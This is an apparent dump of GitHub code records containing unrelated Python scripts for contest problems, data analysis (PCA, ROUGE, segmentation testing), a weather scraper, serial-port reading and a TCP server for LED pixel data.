remap[a.defout[accessible_states[cur]]]\n cur+=1\n res.nb = cur\n \n for i in a.fin:\n if i in remap:\n res.fin.append(remap[i])\n # print(\" ====== TRIM ===== \")\n # res.show()\n return res\n\na = Auto.trim(Auto.from_ruleset(rules.strip().split('|')))\n\ndef_tr = [0]*a.nb\ncount_tr = [0]*a.nb\none_tr = [[] for _ in range(a.nb)]\nfor s1 in range(a.nb):\n for (c,s2) in a.out[s1].items():\n one_tr[s1].append(s2)\n count_tr[s1] = len(alphabet)-len(a.out[s1])\n def_tr[s1] = a.defout[s1]\n\ncur=[0]*a.nb\nfor i in a.fin:\n cur[i]=1\n\nfor i in range(steps):\n nxt=[0]*a.nb\n for f in range(a.nb):\n nxt[f] = cur[def_tr[f]]*count_tr[f]\n for t in one_tr[f]:\n nxt[f]+=cur[t]\n for i in range(a.nb):\n cur[i] = nxt[i] % 10000000\nprint 
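The final loop of the automaton solution above counts accepted strings of each length by dynamic programming over DFA states, using a default transition for every symbol that has no explicit edge. The same idea in isolation, without the modulus; the two-state example DFA is invented for illustration:

def count_accepted(n_states, transitions, default, finals, alphabet_size, length):
    """Count strings of a given length accepted by a DFA with default transitions.

    transitions[s] maps explicit symbols to target states; the remaining
    (alphabet_size - len(transitions[s])) symbols all go to default[s].
    """
    # cur[s] = number of suffixes of the remaining length accepted from state s
    cur = [1 if s in finals else 0 for s in range(n_states)]
    for _ in range(length):
        nxt = [0] * n_states
        for s in range(n_states):
            nxt[s] = cur[default[s]] * (alphabet_size - len(transitions[s]))
            for t in transitions[s].values():
                nxt[s] += cur[t]
        cur = nxt
    return cur[0]  # state 0 is the start state

# DFA over {a, b} accepting words with an even number of 'a':
trans = [{"a": 1}, {"a": 0}]
print(count_accepted(2, trans, default=[0, 1], finals={0}, alphabet_size=2, length=3))  # 4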
(cur[0])\n","repo_name":"romeorizzi/SWERC_2_CMS","sub_path":"swerc_original/kabobs/submissions/accepted/sol_louis_good.py","file_name":"sol_louis_good.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38294502585","text":"#program that finds the min and max value in list \nli=[-5,6,1,2,8,0,99]\nmax=li[0]\nmin=li[0]\nfor i in range(1,len(li)):\n if li[i] > max:\n max = li[i]\n if li[i] < min :\n min = li[i]\nprint(min,max)","repo_name":"tahe-ba/Programmation-Python","sub_path":"serie/serie 3 liste/code/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1503886439","text":"\nimport aztec.build_half_coin as bhc\n\nimport triangle.array_util as util\n\ncol_dict = dict()\ncol_dict[1] =[[k, ] for k in range(0, 2)]\n\n\n# columns must weakly increase\ndef get_column(size):\n if not size in col_dict:\n prev_list = get_column(size-1)\n new_list = []\n for idx in range(size+1):\n for prev in prev_list:\n if idx <= prev[0] or (idx == size and prev[0] == size-1):\n new_list.append([idx,] + prev)\n col_dict[size] = new_list\n\n return col_dict[size]\n\n\n# initialize the ocean dictionary\npst2_dict = dict()\npst2_dict[1] = [[[k, ],] for k in range(0,2)]\n\n# no constraints for columns?\ndef get_pst2(size):\n if not size in pst2_dict:\n prev_list = get_pst2(size-1)\n col_list = get_column(size)\n new_list = []\n\n for c in col_list:\n for p in prev_list:\n new_list.append([c,] + p)\n\n pst2_dict[size] = new_list\n\n return pst2_dict[size]\n\n\ntemp = get_pst2(2)\n\n#for t in temp:\n# print(t)\n\n\ndef flip(triangle):\n first_col = triangle[0]\n new_triangle = [[x,] for x in first_col]\n for row in triangle[1 : len(triangle)]:\n for idx in range(len(row)):\n new_triangle[idx].append(row[idx])\n\n return new_triangle\n\n\nfor size in range(2,5):\n pst2_list = get_pst2(size)\n pst2_list = [flip(t) for t in pst2_list]\n\n ocean_list = bhc.get_coin_oceans(size)\n stack_list = [ bhc.ocean_to_stack2(t) for t in ocean_list]\n\n stack_name_list = [str(s) for s in stack_list]\n\n\n #print('missing in pst:')\n #for p in pst2_list:\n # util.print_array(p)\n # if not str(p) in stack_name_list:\n # for row in p:\n # print(row)\n # print('---------')\n\n print(len(pst2_list))\n print(len(stack_list))\n\n # for p in stack_list:\n # for row in p:\n # print(row)\n # print('---------')\n\n util.print_block_totals(pst2_list)","repo_name":"mathbeveridge/asm","sub_path":"aztec/build_permutation_stack2.py","file_name":"build_permutation_stack2.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27844912578","text":"#!python\nimport time\nimport cgi\nfrom serial import Serial\nimport subprocess\nimport re\nimport threading\n\ng_values = []\nclass myThread(threading.Thread):\n def _init_(self,threadID,portname):\n threading.Thread._init_(self)\n self.threadID = threadID\n self.portname = portname\n def run(self):\n threadLock.acquire()\n uart1(self.threadID,self.portname)\n threadLock.release()\n\ndef uart1(name,portName):\n ser = Serial(portName, baudrate=9600, bytesize=8, parity='N', stopbits=1, timeout=None)\n print(\"connected to: \" + ser.portstr)\n while True:\n line = ser.readline(ser.inWaiting()).decode('utf-8')[:-2]\n if line:\n t = line.split(\",\")\n line2 = float(t[5])\n if line2 > 
0:\n do_fuzzy(line2)\n ser.close()\n\ndef do_fuzzy(value):\n print(value)\n\nthreadLock=threading.Lock()\nthreads = []\n\n#create new threads\nthread1 = threading.Thread(target = uart1, args=(\" uart4\",'/dev/ttyS4'))\nthread2 = threading.Thread(target = uart1, args=(\"uart3\",'/dev/ttyS3'))\nthread3 = threading.Thread(target = uart1, args=(\"uart7\",'/dev/ttyS6'))\n\n#start new Thread!\nthread1.start()\nthread2.start()\nthread3.start()\n\n#add threads to thread list\nthreads.append(thread1)\nthreads.append(thread2)\nthreads.append(thread3)\n\n#wait for all threads to complete\nfor t in threads:\n t.join()\n","repo_name":"reyueei/voltCtrlFLC","sub_path":"SRC/serialReading.py","file_name":"serialReading.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71174896193","text":"import os; os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"1\"\nimport nodetails as nd\nfrom nodetails import ndabs, util, prep\nfrom nodetails import metrics\n\n\ndef score_validation_set(abs_model, x_val, y_val, lexicon,\n item_range=(0, 1), depug_output=False):\n x_tkn, y_tkn, x_len, y_len = lexicon\n\n def decode_validation_seq(it):\n result = ndabs.decode_sequence(it.reshape(1, x_len), abs_model)\n assert result, f\"Empty result of type {type(result)} at item #{it}\"\n return result\n\n rouge1 = []\n rouge2 = []\n rougeL = []\n for i in range(*item_range):\n sum_orig = (ndabs.seq2text(y_val[i], y_tkn).replace(\"\", \"\")\n .replace(\"\", \"\")\n .strip())\n sum_pred = decode_validation_seq(x_val[i])\n scores = metrics.get_rogue_f1_score(sum_pred, sum_orig)\n rouge1.append(scores[\"rouge-1\"])\n rouge2.append(scores[\"rouge-2\"])\n rougeL.append(scores[\"rouge-l\"])\n if depug_output:\n print(\"\\nReview #%s: \" % i)\n print(\"rouge-1 : %.7f\" % scores[\"rouge-1\"])\n print(\"rouge-2 : %.7f\" % scores[\"rouge-2\"])\n print(\"rouge-l : %.7f\" % scores[\"rouge-l\"])\n\n def mean(L):\n return sum(L)/len(L)\n\n return mean(rouge1), mean(rouge2), mean(rougeL)\n\n\nif __name__ == \"__main__\":\n nd.enable_vram_growth()\n nd.set_debug(True)\n\n dataset_name = \"wikihow\"\n x_len = 120\n y_len = 15\n column_names = {\"text\": \"text\", \"title\": \"sum\"}\n\n dataset = util.cached_read_dataset_csv(\"../data/wikihow_articles/wikihowAll.csv\",\n nrows=1000,\n renaming_map=column_names)\n training_data, lexicon = prep.prepare_training_set(dataset,\n x_len, y_len,\n split=.1)\n\n abs_model = ndabs.load_model(\"../data/_models/nodetails--wikihow--120-15--1000.model\")\n scores = score_validation_set(\n abs_model, training_data.x_val, training_data.y_val, lexicon,\n item_range=(0, 99))\n\n print(scores)\n print(\"Done\")\n\n# END OF test_metrics.py\n","repo_name":"bozdogan/nodetails","sub_path":"code/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72891983235","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n#file: weather.py\r\n\r\n#windows , linux\r\n#pip install --user package_name\r\n#python3 -m pip install requests\r\n#python3 -m pip install BeautifulSoup4\r\n\r\n#freebsd (NCTU) using python3.4\r\n#python3.4 -m ensurepip --user\r\n#python3.4 -m pip install --user beautifulsoup4\r\n#python3.4 -m pip install --user requests\r\n\r\n\r\n\r\nimport argparse\r\nimport requests\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\nimport os.path\r\nimport 
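In the serial-reading script above, myThread spells its constructor _init_ with single underscores, so it is an ordinary method: Python never calls it on construction, and the intended fields are never set. The script happens to sidestep the bug by building plain threading.Thread(target=...) objects instead, but a corrected subclass would look like this:

import threading

class PortReader(threading.Thread):
    """Thread subclass with the dunder spelled correctly (__init__, not _init_)."""

    def __init__(self, thread_id: int, port_name: str):
        super().__init__()  # Thread's own initializer must run
        self.thread_id = thread_id
        self.port_name = port_name

    def run(self):
        print(f"thread {self.thread_id} would read {self.port_name}")

t = PortReader(1, "/dev/ttyS4")
t.start()
t.join()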
platform\r\n\r\n\r\n\r\n\r\ndef get_weather_data( searchname , unit ):\r\n temp_unit = \"F\"\r\n if unit == \"c\" or unit == \"C\":\r\n temp_unit = \"C\"\r\n\r\n unit = unit.lower()\r\n\r\n woeid_url = \"http://woeid.rosselliot.co.nz/lookup/\"+searchname\r\n r = requests.get(woeid_url)\r\n #print (r.text)\r\n soup_woeid = BeautifulSoup(r.text,\"html.parser\")\r\n\r\n woeid_list = soup_woeid.find_all(\"tr\" , \"woeid_row\")\r\n if not woeid_list:\r\n print(\"Can not find woeid of \"+searchname+\" !\")\r\n return None\r\n woeid = woeid_list[0]['data-woeid'] #index0: best correct woeid\r\n cityname = woeid_list[0]['data-city']\r\n\r\n\r\n\r\n#print( cityname )\r\n weather_url = \"https://weather.yahooapis.com/forecastrss?w={0}&u={1}\".format( woeid ,unit)\r\n#print(weather_url)\r\n weather_html = requests.get(weather_url).text\r\n#print(weather_html)\r\n\r\n\r\n soup_weather = BeautifulSoup( weather_html , \"html.parser\")\r\n\r\n\r\n #handle forecast\r\n forecast=[]\r\n for tag in soup_weather.find_all(\"yweather:forecast\" ):\r\n tmp_str=\"\"\r\n #convert abbrivate month to full month\r\n date_abbr = datetime.datetime.strptime(tag['date'] , \"%d %b %Y\").date()\r\n if platform.system() == \"Linux\" or platform.system() == \"FreeBSD\" :\r\n date_full= date_abbr.strftime(\"%-d %B %Y\") #hyphen for removimg leading zero\r\n else:\r\n date_full= date_abbr.strftime(\"%d %B %Y\")\r\n date_full += \" \"+tag['day']\r\n\r\n tmp_str = date_full+\" \"+tag['low']+\"~\"+tag['high']+temp_unit+\" \"+tag['text']\r\n\r\n forecast.append( tmp_str )\r\n\r\n #handle sunrise/sunset\r\n suntime = soup_weather.find(\"yweather:astronomy\")\r\n sunrise = datetime.datetime.strptime( suntime['sunrise'] ,\"%I:%M %p\" ).time()\r\n sunset = datetime.datetime.strptime( suntime['sunset'] , \"%I:%M %p\").time()\r\n\r\n\r\n #handle current weather\r\n current = soup_weather.find(\"yweather:condition\")\r\n\r\n city_info={}\r\n city_info['name'] = cityname\r\n\r\n city_info['current'] = cityname+\", \"+current['text']+\", \"+current['temp']+temp_unit\r\n city_info['forecast'] = forecast\r\n #add padding zero on hour\r\n city_info['suntime'] = \"sunrise: \"+sunrise.strftime('%I:%M %p').lower()+\", \"+\"sunset: \"+sunset.strftime('%I:%M %p').lower()\r\n\r\n\r\n return city_info\r\n\r\n#print(city_info['suntime'])\r\n\r\n#print ( soup.find_all(\"td\" , \"woeid\") )\r\n#for tag in soup.find_all(\"td\",\"woeid\"):\r\n# if tag.has_attr('class'):\r\n# print (tag)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n locations=[]\r\n temp_unit = None\r\n #argument setting\r\n\r\n parser = argparse.ArgumentParser(\"Weather Indicator\")\r\n group = parser.add_mutually_exclusive_group()\r\n\r\n parser.add_argument(\"-l\", type=str , help=\"location\" , dest=\"location\" , metavar='locations')\r\n parser.add_argument(\"-u\", type=str , help=\"temperature unit\", choices=['c','f'] , dest= \"unit\" ,metavar=\"unit\" )\r\n\r\n\r\n group.add_argument(\"-a\", help=\"equal to -c -d 5\", action=\"store_true\" , dest=\"all\" )\r\n\r\n\r\n group.add_argument(\"-c\", help=\"current condition\" , action=\"store_true\" , dest=\"current\")\r\n group.add_argument(\"-d\" ,help=\"forecast\", metavar=\"day\" , dest=\"forecast\")\r\n parser.add_argument(\"-s\", help=\"sunset/sunrise\" , action=\"store_true\", dest=\"sun\" )\r\n\r\n args = parser.parse_args()\r\n\r\n\r\n #check config file & set location\r\n if os.path.isfile(\"config.py\"):\r\n#print(\"config.py exists! 
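The date formatting above branches on platform.system() because the zero-stripping %-d flag is a glibc extension that Windows lacks. Reading the day straight off the date object removes the branch entirely:

import datetime

def format_date(d: datetime.date) -> str:
    """'5 March 2024' on every platform; avoids the non-portable '%-d' flag."""
    return f"{d.day} {d.strftime('%B %Y')}"

print(format_date(datetime.date(2024, 3, 5)))  # 5 March 2024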
\")\r\n temp_unit=\"F\"\r\n with open( \"config.py\" , \"r\") as filein:\r\n for line in filein:\r\n text = line.lstrip()\r\n if text[0] == \"#\": #ignore comment\r\n continue\r\n else:\r\n textlist = text.split(\"=\" , 1 )\r\n if textlist[0] == \"LOCATION\" or textlist[0] == \"location\":\r\n textlist[1] = textlist[1].replace(\"\\\"\" , \"\")\r\n locations = [ x.strip() for x in textlist[1].split(',')]\r\n#print(locations)\r\n elif textlist[0] == \"UNIT\" or textlist[0] == \"unit\":\r\n temp_unit = textlist[1].strip()\r\n temp_unit = temp_unit.replace(\"\\\"\" , \"\")\r\n if temp_unit not in ['c' ,'C' ,'f' ,'F']:\r\n print(\"temperature unit setting fail\")\r\n print(\"unit:['C'|'F'|'c'|'f']\")\r\n print(\"use default temperature unit\")\r\n else:\r\n temp_unit = temp_unit.upper()\r\n#print(\"Setting\"+temp_unit)\r\n else:\r\n print(\"config.py file format wrong\")\r\n print(\"Example:\")\r\n print(\"LOCATION: hsinchu\")\r\n print(\"UNIT: C\")\r\n\r\n\r\n#print(\"Setting\"+temp_unit)\r\n# print(args.location is None)\r\n#print( locations )\r\n if( ( args.location is None) and ( not locations ) ):\r\n print(\"Must specify location\")\r\n parser.print_help()\r\n exit()\r\n\r\n if( ( args.unit is None ) and ( temp_unit is None ) ) :\r\n print(\"Must specify type of information --no unit\") #no unit\r\n parser.print_help()\r\n exit()\r\n\r\n\r\n if args.all and args.forecast:\r\n print(\"argument conflict error !\")\r\n print(\"[-a] and [-d day] cannot be used at the same time\")\r\n exit()\r\n\r\n\r\n\r\n\r\n#print(args)\r\n if (args.all or args.current or args.forecast or args.sun ) == False:\r\n print(\"Must specify type of information --no [ -a | -c | -d ][ -s ]\")\r\n parser.print_help()\r\n exit()\r\n\r\n if args.forecast:\r\n day = int(args.forecast)\r\n if day < 1 or day >5:\r\n print(\"[-d day] day must be in range 1~5\")\r\n exit()\r\n\r\n if not (args.location is None):\r\n locations = [ x.strip() for x in args.location.split(',') ]\r\n\r\n if not (args.unit is None) :\r\n temp_unit=args.unit\r\n\r\n\r\n for city in locations:\r\n if not city: #empty city name\r\n continue\r\n\r\n info = get_weather_data( city , temp_unit )\r\n if not info: #return none --> cannot find woeid\r\n continue\r\n print( info['name'] )\r\n\r\n if args.all:\r\n print( info['current'] )\r\n for text in info['forecast']:\r\n print( text )\r\n elif args.current:\r\n print( info['current'] )\r\n\r\n if args.forecast:\r\n for i in range( 0 , int(args.forecast) ):\r\n print(info['forecast'][i])\r\n\r\n if args.sun:\r\n print( info['suntime'])\r\n\r\n\r\n\r\n\r\n #print(\"LOCATION:\"+str(locations) )\r\n #print(\"UNIT:\"+temp_unit)\r\n","repo_name":"hhchung/Weather_Report--python","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10872825511","text":"import urllib.request\r\nimport numpy as np\r\nimport math\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom numpy.linalg import linalg\r\n\r\nmy_url = \"https://www.cs.purdue.edu/homes/ribeirob/courses/Fall2017/data/airpollution.csv\"\r\n\r\nheader_line = True\r\n\r\ndata = []\r\n\r\nlocal_filename, headers = urllib.request.urlretrieve(my_url)\r\nwith open(local_filename) as in_file:\r\n for line in in_file.readlines():\r\n if not header_line:\r\n newLine = line.split(',')\r\n data.append(newLine[2:8])\r\n else:\r\n header_line = False\r\n# print(data)\r\nX = np.array(data, 
dtype=float)\r\n\r\n\r\nm_j = []\r\n\r\nfor i in range(6):\r\n temp = 1/41 * sum(X[:, i])\r\n m_j.append(temp)\r\n\r\n# print(m_j)\r\n\r\nstd_hat_j = []\r\n\r\ntemp = 0\r\nfor j in range(6):\r\n for i in range(41):\r\n temp += math.pow(X[i, j] - m_j[j], 2)\r\n temp = math.sqrt(temp * (1/41))\r\n std_hat_j.append(temp)\r\n temp = 0\r\n\r\nX_prime = np.zeros((41, 6), dtype=float)\r\n\r\nfor j in range(6):\r\n for i in range(41):\r\n X_prime[i, j] = (X[i, j] - m_j[j])/std_hat_j[j]\r\n\r\nS = np.zeros((6, 6), dtype=float)\r\n\r\nfor i in range(41):\r\n S += 1/41 * np.outer(X_prime[i], np.transpose(X_prime[i]))\r\n\r\n\r\n# eig_values = linalg.eigvals(S)\r\neig_values, eig_vectors = linalg.eig(S)\r\n\r\n# print(eig_vectors)\r\nfor i in range(6):\r\n eig_values[i] = math.fabs(eig_values[i])\r\n\r\nsorted_eig_values = sorted(eig_values, reverse=True)\r\nprint(\"Q2) a)\")\r\nfor i in range(6):\r\n print(sorted_eig_values[i])\r\n\r\n\r\nfig = plt.figure(figsize=(8, 5))\r\n\r\nsum_per_column_x_prime = []\r\n\r\nfor i in range(6):\r\n temporary = sum(S[:, i])\r\n sum_per_column_x_prime.append(temporary)\r\n\r\n\r\nvals = np.arange(len(eig_values))+1\r\nplt.plot(vals, eig_values, 'ro-', linewidth=3)\r\nplt.title(\"Scree plot\")\r\nplt.xlabel(\"Range\")\r\nplt.ylabel(\"Eig Values\")\r\nplt.savefig('ScreePlot.png')\r\nplt.close()\r\n\r\nU = np.zeros((6, 2), dtype=float)\r\n\r\nfor i in range(6):\r\n U[i, 0] = eig_vectors[i][0]\r\n U[i, 1] = eig_vectors[i][1]\r\n\r\n# print(U)\r\n\r\nX_new = np.matmul(X_prime, U)\r\n# print(X_new)\r\nplt.title('Scatter plot for X_new')\r\nplt.scatter(X_new[:, 0], X_new[:, 1])\r\nplt.savefig('ScatterPlotX_new.png')\r\nplt.close()\r\n\r\n\r\n","repo_name":"HarshPatel682/Data_Mining_Course","sub_path":"Homework2/hw2-2.py","file_name":"hw2-2.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74451754114","text":"import logging\n\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\nfrom utils.dataset import SegDataset\nfrom torch.utils.data.sampler import WeightedRandomSampler\nfrom torch.utils.data import DataLoader\nfrom unet.model import UNet\nfrom evaluate import evaluate\n\n\nclass TestModel:\n\n def __init__(self, model_path, dataset: SegDataset):\n\n if dataset.n_classes > 1:\n raise NotImplementedError\n\n self.net = UNet(n_channels=3, n_classes=dataset.n_classes)\n self.dataset = dataset\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n logging.info(f'Loading model {model_path}')\n logging.info(f'Using device {self.device}')\n\n self.net.to(device=self.device)\n self.net.load_state_dict(torch.load(model_path, map_location=self.device))\n\n logging.info('Model loaded!')\n\n self.net.eval()\n\n def predict_by_idx(self, idx, threshold=None):\n sample = self.dataset[idx]\n img = sample['image']\n mask = sample['mask']\n np_img = img.permute(1, 2, 0).numpy()\n np_mask = mask.permute(1, 2, 0).numpy()\n\n with torch.no_grad():\n output = self.net(torch.unsqueeze(img, 0).to(self.device))\n\n if self.net.n_classes == 1:\n probs = torch.sigmoid(output)[0]\n else:\n raise NotImplementedError\n\n pred_mask = probs.cpu().permute(1, 2, 0).numpy()\n if threshold is not None:\n pred_mask = pred_mask > threshold\n\n return np_img, np_mask, pred_mask\n\n def show_predict_by_idx(self, idx, threshold=None):\n img, markup, predict = self.predict_by_idx(idx, threshold)\n\n plt.title('Image')\n plt.imshow(img/img.max())\n 
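The PCA above builds the covariance of the standardized data with an explicit outer-product loop, then keeps the first two columns of np.linalg.eig's output; eig returns eigenpairs in no guaranteed order, so those columns are not necessarily the top components. A vectorized sketch that sorts explicitly; np.linalg.eigh also suits the symmetric covariance matrix better:

import numpy as np

def pca_project(X: np.ndarray, k: int) -> np.ndarray:
    """Standardize columns, then project onto the top-k principal components."""
    Z = (X - X.mean(axis=0)) / X.std(axis=0)         # column-wise standardization
    S = (Z.T @ Z) / Z.shape[0]                       # same covariance as the outer-product loop
    eigvals, eigvecs = np.linalg.eigh(S)             # symmetric solver, ascending eigenvalues
    top = eigvecs[:, np.argsort(eigvals)[::-1][:k]]  # columns of the k largest eigenvalues
    return Z @ top

rng = np.random.default_rng(0)
print(pca_project(rng.normal(size=(41, 6)), k=2).shape)  # (41, 2)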
plt.show()\n\n plt.title('Markup')\n plt.imshow(markup)\n plt.show()\n\n plt.title(f'Predict. Threshold: {threshold}')\n plt.imshow(predict)\n plt.show()\n\n def evaluate(self, n_samples, batch_size=8, random_state=0):\n sampler = WeightedRandomSampler(weights=self.dataset.weights,\n num_samples=n_samples, replacement=False,\n generator=torch.Generator().manual_seed(random_state))\n frozen_set = list(sampler)\n loader = DataLoader(self.dataset, sampler=frozen_set,\n batch_size=batch_size, num_workers=4,\n pin_memory=True)\n score = evaluate(self.net, loader, self.device)\n return score.cpu().item()\n\n\nif __name__ == '__main__':\n model_path = '/net/ml4/home/ac/git/seg/checkpoints/checkpoint_epoch48.pth'\n\n bundle_path = './data/c_bundle_hs_128_256.h5'\n\n markup_mapping = {\n 'human_step': 'human__step',\n 'human__step': 'human__step',\n }\n\n test_dataset = SegDataset(group_name='test', bundle_path=bundle_path,\n markup_mapping=markup_mapping, filter_id=13)\n\n test_model = TestModel(model_path, test_dataset)\n","repo_name":"aechernenko/seg","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23641572371","text":"import sys\r\nimport urllib2\r\nimport json\r\nfrom time import sleep\r\n\r\nfin = open( 'B-small-attempt0.in', 'r')\r\nfout = open( 'b.out', 'w')\r\n\r\ncases = fin.readline()\r\nnList = []\r\n\r\nfor i in range( 0, 31):\r\n k = i / 3\r\n #print k\r\n if i % 3 == 0:\r\n nList.append( [k,k,k])\r\n elif i % 3 == 1:\r\n nList.append( [k,k,k+1])\r\n elif i % 3 == 2:\r\n nList.append( [k,k+1,k+1])\r\n\r\nfor i in range( int(cases)):\r\n line = fin.readline()\r\n para = line.split(' ')\r\n N = para[0]\r\n S = int(para[1])\r\n P = int(para[2])\r\n t = []\r\n r = []\r\n cnt = 0\r\n for j in range( 0, int(N)):\r\n t.append( nList[int(para[j+3])])\r\n \r\n for j in t:\r\n if j[2] >= P or j[1] >=P:\r\n cnt = cnt + 1\r\n elif j[2] == P-1 and j[2]-1 >= 0 and j[1]-1 >= 0 and j[1] ==P-1 and S > 0:\r\n cnt = cnt + 1\r\n S = S - 1\r\n if S == 0:\r\n break\r\n fout.write( \"Case #\" + str(i+1) + \": \" + str(cnt) + '\\n')\r\n \r\nfout.close()\r\nfin.close()\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/783.py","file_name":"783.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73987370114","text":"# coding: utf-8\r\n#\r\n# AtHomeSocketServer\r\n# Copyright © 2016, 2018 Dave Hocker (email: AtHomeX10@gmail.com)\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, version 3 of the License.\r\n#\r\n# See the LICENSE file for more details.\r\n#\r\n\r\n\r\nimport sys\r\ntry:\r\n import socketserver as socketserver\r\nexcept ImportError:\r\n import SocketServer as socketserver\r\nfrom struct import unpack\r\n\r\n\r\nclass TCPRequestHandler(socketserver.BaseRequestHandler):\r\n \"\"\"\r\n The RequestHandler class for our server.\r\n\r\n It is instantiated once per connection to the server, and must\r\n override the handle() method to implement communication to the\r\n client.\r\n \"\"\"\r\n\r\n call_sequence = 1\r\n\r\n # The command_handler_class is injected by the user of this class\r\n # See dmx_client.py for an example implementation.\r\n command_handler_class = 
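predict_by_idx above already follows the standard single-image inference recipe for a binary head; compressed into one reusable function it reads as below. Like the class above, this assumes the network returns raw logits for a (C, H, W) image tensor:

import torch

@torch.no_grad()
def predict_mask(net, image: torch.Tensor, device, threshold: float = 0.5):
    """Single-image binary-segmentation inference: sigmoid, then threshold."""
    net.eval()                                   # freeze dropout / batch-norm statistics
    logits = net(image.unsqueeze(0).to(device))  # add the batch dimension
    probs = torch.sigmoid(logits)[0]             # back to (C, H, W)
    return (probs > threshold).cpu()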
None\r\n\r\n # Default size of a complete LED data frame for 50 pixels\r\n frame_size = 8 + (50 * 4)\r\n\r\n @classmethod\r\n def set_frame_size(cls, frame_size):\r\n \"\"\"\r\n Complete LED data frame size injection\r\n :param frame_size:\r\n :return:\r\n \"\"\"\r\n cls.frame_size = frame_size\r\n\r\n @classmethod\r\n def set_command_handler_class(cls, command_handler_to_use, connection_time_out=-1):\r\n \"\"\"\r\n Command handler injection\r\n :param command_handler_to_use: A class that implements a\r\n Response class and an execute_command method.\r\n :param connection_time_out:\r\n :return:\r\n \"\"\"\r\n cls.command_handler_class = command_handler_to_use\r\n cls.connection_time_out = connection_time_out\r\n\r\n \"\"\"\r\n This handler uses raw data from the SocketServer.TCPServer class.\r\n \"\"\"\r\n\r\n def handle(self):\r\n print(\"Connection from {0}\".format(self.client_address[0]))\r\n\r\n # Do until close is received\r\n connection_open = True\r\n while connection_open:\r\n # self.request is the TCP socket connected to the client\r\n led_data = self.read_led_data()\r\n\r\n if led_data and len(led_data) > 0:\r\n try:\r\n # The command handler generates the response\r\n if TCPRequestHandler.command_handler_class:\r\n # Create an instance of the command handler\r\n handler = TCPRequestHandler.command_handler_class()\r\n # Pass the command string to the command handler\r\n response = handler.execute_command(self.request.getsockname()[1], led_data)\r\n except Exception as ex:\r\n print(\"Exception occurred while handling LED data\")\r\n print(str(ex))\r\n print(led_data)\r\n finally:\r\n pass\r\n\r\n TCPRequestHandler.call_sequence += 1\r\n else:\r\n # We consider this an error, so we force close the socket\r\n connection_open = False\r\n print(\"Connection closed\")\r\n\r\n def read_led_data(self):\r\n \"\"\"\r\n Read a stream of LED data from a socket\r\n :return: Returns a list of bytes or None\r\n \"\"\"\r\n # This is essentially APA102 format.\r\n # client_frame_size followed by\r\n # 4 bytes all zeroes header + 4 bytes per pixel * pixels + 4 bytes all ones trailer\r\n client_frame_size = self.receive(4)\r\n if not client_frame_size:\r\n print(\"Unable to read client frame size\")\r\n return None\r\n # Note that the result of unpack is a tuple with one value\r\n client_frame_size = unpack('!i', client_frame_size)[0]\r\n if client_frame_size != TCPRequestHandler.frame_size:\r\n print(\"Client frame size does not match configured number of pixels\")\r\n return None\r\n\r\n led_data = self.receive(TCPRequestHandler.frame_size)\r\n if not led_data:\r\n print(\"Failed to receive complete frame\")\r\n return None\r\n\r\n # It is likely that some sort of data conversion will be required.\r\n # For now we'll coerce the frame into a list of bytes (which\r\n # should be the format it is already in)\r\n led_data = bytes(led_data)\r\n return led_data\r\n\r\n def receive(self, block_size):\r\n \"\"\"\r\n Read a given number of bytes from stream\r\n :param block_size:\r\n :return:\r\n \"\"\"\r\n count = block_size\r\n led_data = b''\r\n # Read exactly \"count\" bytes\r\n while count:\r\n seg = self.request.recv(count)\r\n if seg:\r\n led_data += seg\r\n count -= len(seg)\r\n else:\r\n # Broken socket\r\n return None\r\n # It is likely that some sort of data conversion will be required.\r\n # For now we'll coerce the frame into a list of bytes (which\r\n # should be the format it is already in)\r\n led_data = bytes(led_data)\r\n return 
